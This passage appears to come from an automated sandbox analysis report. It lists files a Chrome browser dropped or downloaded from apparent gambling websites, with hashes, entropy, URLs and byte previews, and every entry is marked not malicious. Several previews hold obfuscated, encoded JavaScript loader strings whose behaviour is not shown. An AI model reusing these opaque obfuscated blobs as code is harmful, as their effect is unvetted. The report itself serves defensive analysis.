                                                                                                                                                          SHA-256:1208F707A2E1DF5DC1668FFB426396E0F3572C11EE805A50C1E4F1E35FE6A608
                                                                                                                                                          SHA-512:16645D41B4B62E45668E4ED5A045AE4975D27DF0AA964DF4A0D5B6CB17B058C624CBF699A27E5FF2977C4A1767B4781C268D732EF2154FFAE9BB85EE80220B78
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......@@.... .(B......(...@......... ......@....................A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5406
                                                                                                                                                          Entropy (8bit):7.875836177006229
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mYzFqu2hiwWx/nqMtwje6LcBlKgEBkTnieTOzUXAaZFszy3d2FcOZQ:n3wWx/quw6VIMeiNZEQ
                                                                                                                                                          MD5:0828B6BE9143DDF7D21123D39FF5A13C
                                                                                                                                                          SHA1:008BE056809423055B06BB6705A5C8A990706ED1
                                                                                                                                                          SHA-256:767DCEC9219465104F17C5D75389DE4AE5EEC8ED85CDD4725C7684707F2C9C1D
                                                                                                                                                          SHA-512:E09959DFF2519DCAD30B07C4A1399E25B96183E29AA1CCB3173FF9A7C27C866D59EFBF072F1D85B5F3C807ABDB4BC7617E6CBEB5506575C77F849BA2947C1B71
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:0775CB5AF77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:0775CB59F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.<p....>IDATx..Z.t....o{..$!$a..a
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (816), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):816
                                                                                                                                                          Entropy (8bit):5.745612030410835
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VHtxobKYAj3RrUs1k676rrZEX7WeUhjhFKNq3TsS:VHO9KRZH7ar6XC3hTsS
                                                                                                                                                          MD5:C8E29CF0F0F023BBD167FD4F686C0D9D
                                                                                                                                                          SHA1:9D938969AD6B4F79E12B2BBD127FFFD1C5BABFFD
                                                                                                                                                          SHA-256:6A13605A5FDBDEB5312E083D34D4B8597BCCDE38FE404297EFC3654C4F125060
                                                                                                                                                          SHA-512:04C47215DB2E774C1553431BB14045762F696E626825C09CD6DB50633A0FD627D04174A5A01E2B9C48B7088BF4FC2C8B83BFA856A156735122922F2C75F2B673
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/footerCopyRight.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnLgDgF0AaAbwBMoAXXALgDMBXNGagS3U2pLRJACUZAERMkIAARJqAJ3ZthAbgDyYAFYg2AOgogG7NCAAKMlBBAzqAT0x9hAfXsgkAWRQUmAGxDDyANyhPJhA6AEIABgBfAUUAmQkUAF4QTGFwmAgGYQESGETKGihGFjZONEwhGRBqJhk0MhgzKwAldgBzAAtqOmFfGAo0IxoOuhQdPSgvai0AYXRpKDRp/rQACRRpSMiSAFtqjvckOjJtmCqaEApi1g4uITiJakTqDvYkXkTgAwoUYC0AZQA0gBJAByihSwgAjABBNRtbKpLQAemEAGo0GjhMjviAAB5aNRIbJaF4gcrMG5lWxCZZNVqdJ5oLQMFAoagWLSNCAtdpdWJQeIgRLM1nsznc3mMxTTAAkhjx1AAKvI4JhKaU7mQxroGJNPNMAKocTxaNrVOY8hldTAgEga27lNCVaq1NCPLn0vlM6K+gTbHYoFgcq4O6lCLYkdj5KpoXQya6a8r3QWPZ6vd5oZ5aWVnEAXACi3j2S342fs4k8DC09hgAB862hFFUanUJJCKOw/L4yAsODAZp4oEgjsIxRyZABaSVyRnCbbTeyebieq3e+0lR00sgtt3t1Kd7skbCLvwris0gREf0Cf0kPvyZrk+MAMTQR2wREiAviMmSqQANUNZECERGAoxIUIoQ3KkuGoIRIWoUE0CYbJtmEKhqCgSc/EnAA2KBcHCMAYBgMBfBQzxPBiZldX1J4ZC0fEIBQSwkAXZCmETLceGdE5okUIA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4559
                                                                                                                                                          Entropy (8bit):7.827106635894467
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:CYzFTu2heep4YiLjLEakvXcg1gss5/1cyk59lGWpgFrimmKilbXCDDd:zw73vkv9gt5/yyGcUgFrimmKdd
                                                                                                                                                          MD5:B086C524DDE5F4979489F6A64E0B083C
                                                                                                                                                          SHA1:2BBC83084C9CEBFD37AAD47C5B65C12D5C671CFA
                                                                                                                                                          SHA-256:ABF134961C24281B03DF0BCBD87E497F81F727D3AF64EABEFC81261F978B876C
                                                                                                                                                          SHA-512:3D41230324900CC69468126AC240FD74BC45FE43794F53F4D94744608CAE199ED3B047728A16F44667CE67F96775065FD36B690AC4ACB710F8C4358343DEBBCB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/live_bbin.png
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:070664E1F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:070664E0F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.|.W....IDATx..[ytT....6[f&!!.kY....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17878
                                                                                                                                                          Entropy (8bit):7.959716583208729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:OBLtpneFRErL/izHYU4KNT+GbKJrnl0YMMlTY3X4K6gwI:YtpnCErkN4K8GbKJrnl4Y/gL
                                                                                                                                                          MD5:3421B805EE092419843BD0B3CF2F3AD5
                                                                                                                                                          SHA1:FCDCA9406D3B0A7DE619225D006968F16F401528
                                                                                                                                                          SHA-256:2E72A4B6BB750E21045AA7BA60ABFBD2EA5FB721579ABD2F75875008FD815BD4
                                                                                                                                                          SHA-512:1A8AD295C8B019AE032F5CF1F3A188C189F8B128F6459174D3817147338E3AAD4BE739E869D796161D5F0390820D96916E16FEF371FD9F33C5282B92F67D5599
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/allbet_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D208D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D1F8D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1893
                                                                                                                                                          Entropy (8bit):7.379050153235516
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2DAVPJ3AoUiDoekBSK1pwgqLOz096k:zo7F52EVeJiDoekJ1pPzC
                                                                                                                                                          MD5:79FCFD553114C1522E922ADEFDED85FF
                                                                                                                                                          SHA1:FAD349CC0926AB840E67755840CF2225E42CB6B2
                                                                                                                                                          SHA-256:B347DDA636A764B52EF59BF76249CA5918F945FC1D3C532BC1BE555C6449ADF7
                                                                                                                                                          SHA-512:63D222ECAE3105D4433F1396D3DC31C21358804DE208B544B05434AF25C3690243B9CE8302578BD393F6A438D49E5A05BC598A397034E857755D5611C2647C78
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A6D45FA5A6D711E9B2FBC73306052B4C" xmpMM:DocumentID="xmp.did:A6D45FA6A6D711E9B2FBC73306052B4C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A6D45FA3A6D711E9B2FBC73306052B4C" stRef:documentID="xmp.did:A6D45FA4A6D711E9B2FBC73306052B4C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G..o....IDATx..VIL.a..?Kg.t..m.....q..{4n...hz4...=.'...&z0.O.."1..O.q.1.nX...""T.k...mg.7.Z...M<.g....7......L&.Y..-B
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2884), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2884
                                                                                                                                                          Entropy (8bit):5.88982675673062
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Vg0dcbX5suGwXbsNtO+svKBBYLRgzk1trphhHRE/YOk4Av1JQyFV8gPwX6J0qcYi:VYX50wrsNAiYLukLhxE/Y6+PPhPcGggq
                                                                                                                                                          MD5:B4C10BD9805D326D15F5EBBADAF52581
                                                                                                                                                          SHA1:6B06118D04D6098ACA75ECE336B3A24CCF6BCDD4
                                                                                                                                                          SHA-256:06C66CE4A1AA2C7482E48BB791BF7751D43A154C9EBB13E614307FF10238E200
                                                                                                                                                          SHA-512:78CC9BA487D3A32BE8149C56E4F5607C0A3C574D1533900C80F52018209E4EBFC034E297BFACEEA98B247F62ECDC66E4B0AE2AEB495782CD616C47ED1E52313A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/121/headerTip.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgZgBYBdAGgG8BxXIgDgC4AzAVzRgBcBLdTDskAEoKAXzIBzAMIAlAIrM2nHmj4CyXYQCIWSEAAIkHAE5dOmgNwB5MACsQnAHQATEEy5oQABSMoIIIxwAnpggZJoA+uEgSACyKE4sADYgmpQAblCJLCAMAIQADCKC5hlGBgC8XJia+TAQTJqCZGjlFGhQALY5mtwQSAAyXIapTlAcUArs3LzCRiAcLEZoFDBOaJ5jABYMSM6uUEkcDpLohlBoR6toABIohuod4gCq0v07e0wHiUcnaGcXDiut0MAGpNAB6LgdKDiEAAWggMHBKA4m384M0IOA7icKGADgAygBpACSADkwRiyL0BkMOAxRNSof4GGgkokyE8CQBRbhdBiaVJQ8QAISgugY2E0iXO4nCEAAXqlNEwZeJNOQYCg2BwWfkyFqdf4ACrMoys9kiMRdVHxJAM4UbVGTJS8fhCChzBZLTSbDgcCCacrBo5IFhgQxGTD6oiCAD89NRQ0Baydm0pUJh8MRGJBSd2wrFumwIBIlMxHDEug4JyN5tYU2Uqg9pT0XHKMS2DlVKBQUaIuAAVJ3UQ4jOdcR1MIJBCC4QAmfLmfOA7UXfzlFeG9dGEFcambZPb3VGAB8HAAZBe+IfdseNxwmlu1yeADwgK83o8vjdCK1kDofycF1phUYQxBgOYxhAYCG1dMCKFbDhN1vARymxNBcXxYlyXMKpNFwABBGx1UEaoHFzEAM0wkAAA8HBsJBGgcVEQBUODQJCYQjgAEg8WiOFNeBMA4ptuJYrg+kGQxyhABw0SgFwjAkqS6RKKAynbI4aWko43G+fwRMUTj3VmeZFjQHpmSDEMWMCPwimacpsBIZcVNpQxuz7blYE2IzGzdLQ+RSXJbKCPwryORI6RJXUOk/FoopiuLuy4Ayo1EwLPXMpY9EuGUFQVTdAQKhUAB8ysFMg4VwULynCBwc
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (18632), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18632
                                                                                                                                                          Entropy (8bit):5.98982907585414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:VuRs8jbUtpZjiZeg6Egf33db/h8a+DpBseCZJDkHN0I30QA3yj+Xn:4fU7ZKeg6Egf3by90DkH6Ipea+Xn
                                                                                                                                                          MD5:8AF7B35CAD66377E98B98D4261BB716D
                                                                                                                                                          SHA1:BD52F02009810E35FC621D7111D46F1A51E4435E
                                                                                                                                                          SHA-256:D4B93FA7F565BA13F42FAC331764CF7783550C11DF1624BB1779038FF30CF6CE
                                                                                                                                                          SHA-512:3BB40D0D221C1CD35D93E22DC32C80BE5D078393242798DFCAFAF98C8620FA828C7A497FE3F3D32EFADDD280B2B2CDB88158F6490C9BA88E400B387E8C811F3B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/manifest.js
                                                                                                                                                          Preview:a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA41tbIaqxoSah2rMUqa/mlOshESUSKqhpoAimePv4CaCkZcCAwyGhPAvfImmXI5hbOLuoeXl8ASgwTQeBIKAgdFI6ki2zwjBgYDwEAIeAAvgJ9AQYCQMOiYniAIwATlJAC4LJjZLBEKiUERMG8IkR8gikSicXZWXRGAAPVg6GBELH4AiMcLc4oYODkog2cnAIkxAVCojk/GY9nI1EIKXTWbzHr8wUTeWMGK81VmpQQAo9WzAKzG63C9FQiU0+QodDYMWkWIIJxvCwkMOM7WciCMMgEUYIFRwIiMZBeumoTAIJ7o05vCOInXEOwAJic2Nx0dj8cTydTkFpCmUdowAbsQfsTYcOYERBLxRgosIKhINCgYBUXnc3kRAFFPBOIMKAEIdAAqOG8ADkcBPkAAiPyMHBUPdoXLRdQjhBjhfuKAInAwRhzxi3/dEe9wVgwU8Cf6TboSD3J8+RgAB6dQcFwD88C/H8NGmPo8GTXE9zAGAQAAWgADj3BD+g6aASCdBD4AnBB0JIIli0YAAWW06GgJJ/hQgBBGAYFg5h0JTPcICQKBGDwqFoAKFi8HMKFWECPcwOLWiLAAViJAA2TCLAAZjAogYEfOAoAgogwL3QJkAwCxyWAhSVIAdkwygqH5TD1CIPCiUsmANOwmy7IcpyXLw4sPI0xTaKJezqH81ylA0jzsPiklMLaQ88AAYSQLCAqUWi4oSiLHL5ZzosUjyVIsJSkv8Rg0oyoq8JU0rysU
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1823
                                                                                                                                                          Entropy (8bit):7.128143305251574
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:euinNuiVprKeJ3jt7IhEXtPxaRxngxTfKZhpTPr:2NoG7IhE9PEAM/T
                                                                                                                                                          MD5:29FFB1C72B8ABB2705B044AFD206B78F
                                                                                                                                                          SHA1:6409A4B4EBF0F3BFEC03B976629ECF0CAF17BB69
                                                                                                                                                          SHA-256:3C3D8821368D28F376C4CBC0009D73280331BCE3AAE3DD4B3E9819795188E67D
                                                                                                                                                          SHA-512:C9569BA594693AAF2D09B6E3110F4B978BA2C0A532FCB354C71E3ABF730BBF7D901E01B61490D45C5E26E5DD5890AD1263B16CF58580702D85B238507DA8CC87
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_ag.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:1B03F615F77811E79594A93B56FBC396" xmpMM:InstanceID="xmp.iid:1B03F614F77811E79594A93B56FBC396" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a581549a-d504-de42-880f-f1f6b1e4689b" stRef:documentID="adobe:docid:photoshop:fe692dff-f776-11e7-8e5d-cdd6397f58a0"/> </rdf:Description
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3871
                                                                                                                                                          Entropy (8bit):7.942910088325684
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:6SStwprXt/cAYeCS40r2yfnvPQRG6CFxLoZuQRnxt3C6BKsor:6SStst/cAYl62QXQPZDH3C6Bsr
                                                                                                                                                          MD5:D3F65BE5FF7775151A36E4945FD2CD01
                                                                                                                                                          SHA1:D0E6267B5F14ECC73AFC3E5AE5CE97684A4B0380
                                                                                                                                                          SHA-256:18CAAEEC7041497578C2E566B3BBA4922D7882B4080FA1AF28CE02A844E25258
                                                                                                                                                          SHA-512:028AC4100EC0464F40CAAE289AC11AF00D394A4A159271335CEE525E830C11FC148F8519011B203167FEA2EF448F36541A505EB7ED6B4F1F9C0A793990688998
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....pHYs.................IDATh..y.%Wu..s..u.^.{..gl..1`......`....H.b...@Y.d.@..M.X.... ..@..`d;.CXL....oxf.0...=..~..{O.x6..!`C"u.'=...z.[...9*13.?I......*.J.*.J.*.J.*.J.*.J.*.J.*.J.....Dq.....#....]..@.t........O_...".....!..j.0?8.j...S..B..&......0.L....k.A?;.po...]O..Z..c=N..#...j.-3....j..M...'>........]....+....8..../..z...!..3...{......m....}. ......<3....xM..,-..=.x.1..".b. .0...t..d.[U.*......B..+#|.$.hFeP,5.e...E...+..A..ciAY+".8..XU(.....A.5b..X?....Yx..!.......98.k....#.p.Xp..p..*..D@4.....Km..Q(F.@].H3.X. D.......\V..Hc.....h..4/...-.#k.*z.....~P.n.;ya........K..Z.N.@p...,.[.,9.....!.6!...n....a..>..8.=k.\].u....a.....NR_.....A.x?y;..=m......<.y.d..........f..o7.....WU*."`......e.~..?..a....K..dT..jx?...q..)ay.=S.<..L.>e.s..[...,.YBQ..8..j9&...r.. ........&.>.).HS*.VT..S....!.........`....-Ne.&."v~^.'d..<.m..o9..0.%.x.]~..N.R..CT...,.`k...z.4.v9m..R.)e4.a.....@...'....&..yUK.;.f..........R..|1~.....E
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):108015
                                                                                                                                                          Entropy (8bit):6.099067518890094
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:uaglDavyQEyIWLcb/+W+2CJr71V+F3pdMBFf/kqjYf2FvZ/DKj8m9S4Aww0EEY:XlJM+W+2CJrs3pdOrkfkv0j8N2wEY
                                                                                                                                                          MD5:3875C16DCC2FC3155E37F22AA92632D0
                                                                                                                                                          SHA1:25D140EF2CF2AB3C6C9F656D2BE3C756068D5E0E
                                                                                                                                                          SHA-256:F682A144DBA0F29228190EEAAC8014C502C7539949128E9A5C8986BBEBAD8EE6
                                                                                                                                                          SHA-512:B946D8F48D3789B07E21E0EF5A761615E78F134277387E454160FA4C74EC04378DE5A5C44C459EF05C9FEFE4DF272AAB22ED3FAD259EA2D962F2E19AE77C1A19
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/mimlib.wasm
                                                                                                                                                          Preview:.asm........`.......`....`..`...`.....`....`.....`..~......`.......`......`......`..........`........`..~..`..~.`...`.....~`.~..`..|`.....|`..~....`.~......`..~.....`.........`..|.`.........`.............env.runtime.ticks...wasi_snapshot_preview1.fd_write...env.syscall/js.valueGet...env.syscall/js.valuePrepareString...env.syscall/js.valueLoadString...env.syscall/js.finalizeRef...env.syscall/js.stringVal...env.syscall/js.valueSet...env.syscall/js.valueLength...env.syscall/js.valueIndex...env.syscall/js.valueCall..........................................................................................................................................p.............A......A....A.......memory...malloc.~.free...calloc....realloc...._start....resume....go_scheduler....asyncify_start_unwind....asyncify_stop_unwind....asyncify_start_rewind....asyncify_stop_rewind....asyncify_get_state.......A...BDVXYZ[\;:..............#.A.F.@#.#.(..A.k6..#.(..".(..!. .(..!. .(..!. .(..!. .(..!. .(..!....#.A.F.@#.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):316994
                                                                                                                                                          Entropy (8bit):5.349542251999496
                                                                                                                                                          Encrypted:false
